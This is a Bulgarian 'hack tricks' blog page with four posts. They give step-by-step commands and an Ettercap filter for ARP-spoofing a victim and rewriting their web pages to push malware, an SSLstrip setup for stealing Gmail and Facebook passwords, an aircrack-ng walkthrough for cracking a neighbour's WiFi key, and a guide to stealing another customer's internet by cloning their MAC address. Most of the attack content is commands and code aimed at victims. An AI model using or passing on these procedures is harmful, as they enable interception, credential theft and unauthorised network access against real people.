Показват се публикациите с етикет Хак Трикове. Показване на всички публикации
Показват се публикациите с етикет Хак Трикове. Показване на всички публикации

събота, 22 февруари 2014 г.

Създаване плугин за Ettercap заместващ HTML код


Здравейте ще ви запозная с още една MITM атака .. За целта ползваме отново BackTrack дестрибуцията и Ettercap , като към него създаваме специален плугин заместващ HTML код. Така сърфиращата жертва лесно можете да я прилъжете да дръпне някой ваш експлойт или вирус.
Създаване на плугина:
  1. Създавате smb.filter файл със съдържание:
          if(ip.proto == TCP && tcp.dst == 80) {
          if(search(DATA.data, "Accept-Encoding")) {
          replace("Accept-Encoding", "Accept-Rubbish!");

          msg("zapped Accept-Encoding!\n");
         }
         }
         if(ip.proto == TCP && tcp.src == 80) {
         replace("html код за заместване ", "нов html код");
         replace(
"html код за замесване", "нов html код");
         msg("Filter Ran.\n");
        }

         Пример:
     
    2.   Компилиране на файла - etterfilter smb.filter -o smb.ef
          След компилирането изхода трябва да е такъв или подобен:
                
                    -> Script encoded into 16 instructions.

    3. Стартиране на Ettercap-a
           
               ettercap -T -q -F smb.ef -M ARP /[ипто на жертвата]/ // -P autoadd -i waln0



Практически с тези операции можете да подмените всякакъв html код на жертвата.
Приятно тестване!

Подслушване на мрежа за пароли с Ettercap и SSLstrip


Здравейте в тази публикация ще разясня как става визмането на пароли за логин в различни сайтове ... Лично аз съм го тествал за сайтове като gmail.com abv.bg  skype.com facebook.com (без двуфакторна идентификация)
Това е друг вид MITM атака с която ще ви запозная.Като за начало трябва да имате BackTrack и програми към него Ettercap и SSLstrip.
Ettercap - http://ettercap.github.io/ettercap/
SSLstrip - http://www.thoughtcrime.org/software/sslstrip/
Уверете се че те са ъпдейтнати до последни версии.....

Започваме действайте под руут
  1. Конфигуриране на iptables
     iptables --flush
     iptables --table nat --flush
     iptables --delete-chain
     iptables --table nat --delete-chain
     echo 1 > /proc/sys/net/ipv4/ip_forward 

     iptables -t nat -A PREROUTING -i waln0 -p tcp --destination-port 80 -j REDIRECT --to-port 8080   

Тук wlan0  еимето на адаптера през които правим forwarding-a. Тук съм използвал wireless адаптера (wlan0) на моия комп , но можете да ползвате и ethernet адаптерите eth0 eth1 ... и т.н.
Задължително проверете и ifconfig-a имената ..

     2.   Проверка дали всичко е ОК .. iptables -nvL -t nat
     3.   Стартиране на SSLstrip. Влизате в папката кадето сте го свалили и пишете:
            python sslstrip-0.7/sslstrip.py -a -l 8080 
            или ако сте го инсталирали това - sslstrip -a -l 8080
     4.   Стартиране на Ettercap
            ettercap -TqM ARP:REMOTE // // 
            след като сте го стартирали избирате плугин към него remote_browser
 След стартирането на Ettercap проверете дали forwarding-a в /etc/sysctl.conf
които трябва да е така -> net.ipv4.ip_forward = 1 

 Приятно тестване ...

сряда, 19 февруари 2014 г.

Хакване на паролата на Wireless с WAP кодировка


Хакване на този вид кодировка на wireless e доста лесно атрибутите с които трябва да разполагате са : BackTrack и по възможност малко по стар комп или поне wireless картата ви да поддържа хакнатите драйвъри с които ще можете да си настроите компа да подслушава излъчването на сигналите ...

Ето стъпка по стъпка какво трябва да се прави:
  1. Трябва ви инсталиран aircrack-ng - http://www.aircrack-ng.org/ Практически backtrack-a има инсталиран. По добре е да го обновите отколкото да се мъчете да инсталирате новия , а тук ще ви трябват и малко познания и за линукс средите , които мисля да засегна в други теми като базова информация ..
  2. Всички операции трябва да действате под root
  3. Сега отваряте конзолата и пишете
  4. airmon-ng start wlan0 - Тази команда стартира вашия wireless адаптер за работи като подслушвашта система като използва хакнати драйвъри. Не е задължително след старта името на вашето wireless устройство да се кава wlan0 Преди с стартирате командата трябва да проверите в ifconfig-a как се нарича. След правилното изпълнение на командата ще ви маунтне друго устройство mon0 което пак не е задължително да се казва така ... Тези неща трябва да ги проверите много внимателно защото неправилното изпълнение на тази операция няма да даде резултат :)
  5. airodump-ng mon0 - Стартиране на подслушването през новото маунтнато устройство
  6. airodump-ng -c 11 -w do0ms --bssid 74:EA:3A:E3:E7:14 mon0 Филтриране на подслушването и записването му в файл do0ms(може да е какво ти изберете име),            -c 11(подслушване на канал 11), --bssid 74:EA:3A:E3:E7:14(мак адреса на wireless рутера които искаш да вземеш паролата)
  7. aireplay-ng -1 0 -a 74:EA:3A:E3:E7:14 -h 00:26:B6:F0:E6:EF mon0 Изпращане на пакети за disconnect Като тук -h 00:26:B6:F0:E6:EF е мак адреса на жертвата (лаптоп закачен към рутера на които искате да вземете паролата )
  8. aireplay-ng -3 -b 74:EA:3A:E3:E7:14 -h 00:26:B6:F0:E6:EF mon0 
  9. aircrack-ng -b 74:EA:3A:E3:E7:14 do0ms-01.cap  Декодиране на паролата
Като цяло този тип атаки се водят "мен ат дъ мидъл".

Успех на тестващите! Ако имате въпроси оставете коментар ..

неделя, 9 юни 2013 г.

Кражба на интернет с промяна на МАС ...




Криза е ..! :) много от Вас не могат да си платят интернета ....
Тази публикация не я правя за да Ви науча .. а да се стреснат интернет доставчиците ... Че Випросът ми към тях е - До кога ще ползваме незащитен интернет, застрашени от хакерски набези ... 30 лева такса Ви е много .... ! :)

Ето започвам ...

Глупавите доставчици които не могат да си платят на компютърни специялисти позлват тъпите програмки за филтриране по IP и MAC. На кратко IP e вашия локален адрес примерно 192.168.0.1 a МАC адреса (Media Access Control address), физическия адрес е от типа 16 битов примерно 01:23:45:67:89:ab Повече може да прочетете тук -> http://en.wikipedia.org/wiki/MAC_address

Така ... Как се сменят IP-та няма да обяснявам мисля че всеки знае. Ще се спра на MAC. Kak да си намеря МАС-а и как да го сменя се питате?
Отваряте старт/рън и пишете там "cmd". В черния джам, който ви се отвори пишете "ipconfig" и там гледате за Physical Address .... Ще ви излязат dhcp mask IP итемподобни които вас не ви интересуват ... Общи приказки дрън дрън ...

Ето по същество ... Сканираме мрежата с примерно NetScanner програмката ... тя показва ренджа от ип-та примерно 192.168.1.1 до 192.168.1.250 плюс техните МАС адреси. Запазвате сканираната информация примерно с print screen и си я паствате в някой bmp файл. След извесно време пак си правите скан применро вечерта след 12:00 и виждате кои компютри не са в листата (сравнявате ги с bmp файла). Копирате си МАЦ адреса и го поставате за ваш ...
Е как става ... -> Дясното копче на My network places давате propertise, после пак дясното копче на Local area connection и пак propertice. В прозореца които ви искочи давате на Configure излиза ви друг джам ... давате на Advanced избирате Network Address давате отметка за Value стоиност и въвеждате МАС-а след това си сменяте Ip-то.

Е това е имате интернет а човека които прецакахте няма да има докато вашия комп е включен.. За да затрудните малко тъпите доставчици може да си спрете отговорите на компа echo примерно ако се опитват да пингват .. схващате за какво говоря ..

Е дано съм Ви бил малко от полза по-обширна информация не мисля да давам :)